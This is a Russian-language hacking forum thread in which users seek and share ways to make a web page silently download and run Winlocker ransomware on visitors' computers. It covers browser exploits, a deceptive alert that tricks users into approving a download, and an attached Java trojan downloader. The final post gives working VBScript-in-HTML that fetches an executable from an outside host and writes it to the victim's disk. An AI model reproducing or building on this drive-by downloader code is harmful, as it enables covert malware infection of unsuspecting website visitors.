Воскресенье, 22.12.2024, 05:15 Приветствую вас Гость | Группа "Гости" 
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: xXxSh@dowxXx  
JS downloader
okeДата: Воскресенье, 22.04.2012, 16:38 | Сообщение # 1
Постоянный
Зарегистрирован: 15.01.2012
Группа: Пользователи
Сообщений: 124
Статус: Offline
фооумчане никто не знает как реализовать js.downloader как это используют винлоки? java знаю на 0 подскажите если не сложно...
 
xXxSh@dowxXxДата: Воскресенье, 22.04.2012, 18:17 | Сообщение # 2
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
то есть ты имеешь ввиду что бы при заходе на сайт при помощи ява-скрипта начиналась скрытая загрузка или ты хочешь прям из самой винды как обычный довнлоадер только при помощи явы?
 
okeДата: Среда, 25.04.2012, 21:02 | Сообщение # 3
Постоянный
Зарегистрирован: 15.01.2012
Группа: Пользователи
Сообщений: 124
Статус: Offline
да именно так винлоки поподают на комп
 
xXxSh@dowxXxДата: Среда, 25.04.2012, 21:29 | Сообщение # 4
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
ну вобще без знания уязвимостей (желательно новых), тут не обойтись, в основном они используют именно уязвимости браузеров, ActiveX, Flash и прочего..., на мой взгляд более простой способ найти shell (лучше этого года и как можно новее), и использовать его в своей программе...
но это уже более широкая тема и о ней можно говорить часами smile


Сообщение отредактировал xXxSh@dowxXx - Среда, 25.04.2012, 21:30
 
Don_DiegoДата: Воскресенье, 29.04.2012, 16:49 | Сообщение # 5
Продвинутый
Зарегистрирован: 16.04.2012
Группа: Пользователи
Сообщений: 253
Статус: Offline
Эти способы еще возможно было использовать, но только к браузеру Internet Explorer, а также браузерам на его движке (MyIE, Maxthon). Эти браузеры "кушают" почти все что предложишь smile
А вот если взять более защищенные браузеры, к примеру Opera, Mozilla - тут такая фишка не пройдет. Не знаю по поводу браузера Google Chrome, т.к. очень мало его тестил.
 
xXxSh@dowxXxДата: Воскресенье, 29.04.2012, 17:12 | Сообщение # 6
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
Quote (Don_Diego)
А вот если взять более защищенные браузеры, к примеру Opera, Mozilla - тут такая фишка не пройдет


ну почему же не пройдет, я же говорю, сейчас можно нарыть не малое количество сплоитов из которых можно взять за использование дыру на любой браузер, и уже через нее можно загружать что угодно и как угодно...
в основном нынешние загрузчики как раз и используют подобные уязвимости, но так как эти уязвимости быстро фиксят и исправляют, то и сам код загрузчиков приходится частенько переписывать, еще где то читал раньше что есть java код, java script который прописывается в коде странички самим админом сайта, суть его как раз и заключается в том что юзер переходя по ссылке и попадая на страничку с этим скриптом автоматически начинает загрузку, но если я не ошибаюсь, загрузка не скрытная как при использовании уязвимости, а открытая, то есть пользователю выдается диалоговое окно с выбором "Открыть" "Сохранить" "Отмена"...


Сообщение отредактировал xXxSh@dowxXx - Воскресенье, 29.04.2012, 17:21
 
Don_DiegoДата: Воскресенье, 29.04.2012, 18:01 | Сообщение # 7
Продвинутый
Зарегистрирован: 16.04.2012
Группа: Пользователи
Сообщений: 253
Статус: Offline
xXxSh@dowxXx, конечно, это самый распространенный способ взломов вообще. Но я их не люблю, все по тому что:
Quote (xXxSh@dowxXx)
но так как эти уязвимости быстро фиксят и исправляют, то и сам код загрузчиков приходится частенько переписывать,

И тут не только код переписывать нужно будет - а еще и найти новую уязвимость. А в конечном итоге все сводится к тому что программы стают почти идеальными. Взять к примеру Windows 95/98, NT. Их же переламали все кому не лень, и посмотреть на новые версии ОС...
Я конечно веб-программированием не занимался, но знаю что загрузчики делали через музыку. Да, да, ту самую музыку что играет на некоторых сайтах. Там подтверждения на загрузку не спрашивается, но опять же - это уязвимость. И нет уверенности в том что ее сейчас не пофиксили.
 
xXxSh@dowxXxДата: Понедельник, 30.04.2012, 09:45 | Сообщение # 8
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
Quote (Don_Diego)
знаю что загрузчики делали через музыку


да, тут ты прав, и вполне возможно что будет при некоторых доработках работать и сейчас, ок будем думать... wink
 
XSPYДата: Понедельник, 30.04.2012, 13:15 | Сообщение # 9
Продвинутый
Зарегистрирован: 28.01.2010
Группа: Пользователи
Сообщений: 263
Статус: Offline
а что мешает использовать те же яваскрипты и скрытую загрузку?например,перешел на страницу-началась загрузка и вылазит алерт,а мы этот алерт на свой типа "Добро пожаловать...ляляля...ОК" надал чел ОК-подтвердило загрузку,докачало и автозапуск...
З.Ы:У кого нить остались сорсы 95-98 винды?они были в сети тогда пару дней (до недели),полюбому кто-то успел слить себе...
 
xXxSh@dowxXxДата: Понедельник, 30.04.2012, 18:18 | Сообщение # 10
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
XSPY только нада учитывать еще тот факт что у пользователя выскочит окно загрузки в котором видно что, и откуда качается, да еще и по завершению загрузки сам браузер выведет уведомление, не говоря уже о том что при обычной загрузке файл просто сохраняется, но не запускается...

если кто то найдет скрипт который скрытно загружает, да еще и запускает файл после загрузки, выложите ссылку если вас не затруднит, думаю многим интересно было бы посмотреть...
 
okeДата: Понедельник, 30.04.2012, 23:22 | Сообщение # 11
Постоянный
Зарегистрирован: 15.01.2012
Группа: Пользователи
Сообщений: 124
Статус: Offline
да я проверял на каком то сайте там как раз с помощью js opera mazila chrome все загружалось и запускалось(винлок) ради этого систему 3 раза восстанавливал) ну а ie нет смысла проверять
 
xXxSh@dowxXxДата: Понедельник, 30.04.2012, 23:35 | Сообщение # 12
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
oke и у тебя есть такой винлок?
 
okeДата: Вторник, 05.06.2012, 19:50 | Сообщение # 13
Постоянный
Зарегистрирован: 15.01.2012
Группа: Пользователи
Сообщений: 124
Статус: Offline
нет я как то бродил по нету и наткнулся на наге вот совсем недавно
 
link993Дата: Вторник, 05.06.2012, 20:12 | Сообщение # 14
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
Вот прикладываю троянчик довнлоадер на java. Он не мой. Попробуй декомпильнуть, может быть что и получится!
Прикрепления: APPLET.rar (3.4 Kb)
 
okeДата: Пятница, 08.06.2012, 16:43 | Сообщение # 15
Постоянный
Зарегистрирован: 15.01.2012
Группа: Пользователи
Сообщений: 124
Статус: Offline
я честно говоря java вообще не знаю cry
 
okeДата: Пятница, 08.06.2012, 17:09 | Сообщение # 16
Постоянный
Зарегистрирован: 15.01.2012
Группа: Пользователи
Сообщений: 124
Статус: Offline
http://www.securitylab.ru/virus/406668.php вот что нарыл ну я вообще в java 0
 
okeДата: Пятница, 08.06.2012, 17:22 | Сообщение # 17
Постоянный
Зарегистрирован: 15.01.2012
Группа: Пользователи
Сообщений: 124
Статус: Offline
http://jokeroro.narod.ru/CHKOLA-6/index_0_1_5_5_a.html вот сайт там играет музыка даже после закрытия вкладки значит музыка во временной каталог скачалась и там преведены примеры скриптов если кто разбирается может посмотреть может и получится downloader
 
MASДата: Пятница, 16.08.2013, 17:41 | Сообщение # 18
Участник
Зарегистрирован: 16.08.2013
Группа: Пользователи
Сообщений: 67
Статус: Offline
Цитата (oke)
http://jokeroro.narod.ru/CHKOLA-6/index_0_1_5_5_a.html вот

!! Я недавно на компе нашел бота, бота создал joker и еще какой-то пи-ас, на комп видимо с помощью js downloadera попало, и вот я вижу сайт jokerroro с довнлоадером, осторожно

Добавлено (16.08.2013, 17:41)
---------------------------------------------
Ты знаешь что в html можно встроить vbs скрипт? Только exe файлы редактируются и перестают работать, если только в аинраре, антивирус говорит мне когда я перехажу на страницу что там троян downloader.
вот это в html вставь
<HTML>
<HEAD>
<TITLE>VBS+html</TITLE>
<SCRIPT language=VBScript>


Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")
oXMLHTTP.Open "GET", "http://domain.com/by_MAS.exe", 0'
oXMLHTTP.Send
Set oADOStream = CreateObject("ADODB.Stream")
oADOStream.Mode = 3
oADOStream.Type = 1
oADOStream.Open
oADOStream.Write oXMLHTTP.responseBody
oADOStream.SaveToFile "C:\Users\User\Desktop\by_MAS2.exe", 2'
</SCRIPT>


За одну ночь нельзя изменить свою жизнь, но за одну ночь можно изменить мысли которые изменят твою жизнь. (MAS)
 
  • Страница 1 из 1
  • 1
Поиск:

delphicode.ru © 2008 - 2024 Хостинг от uCoz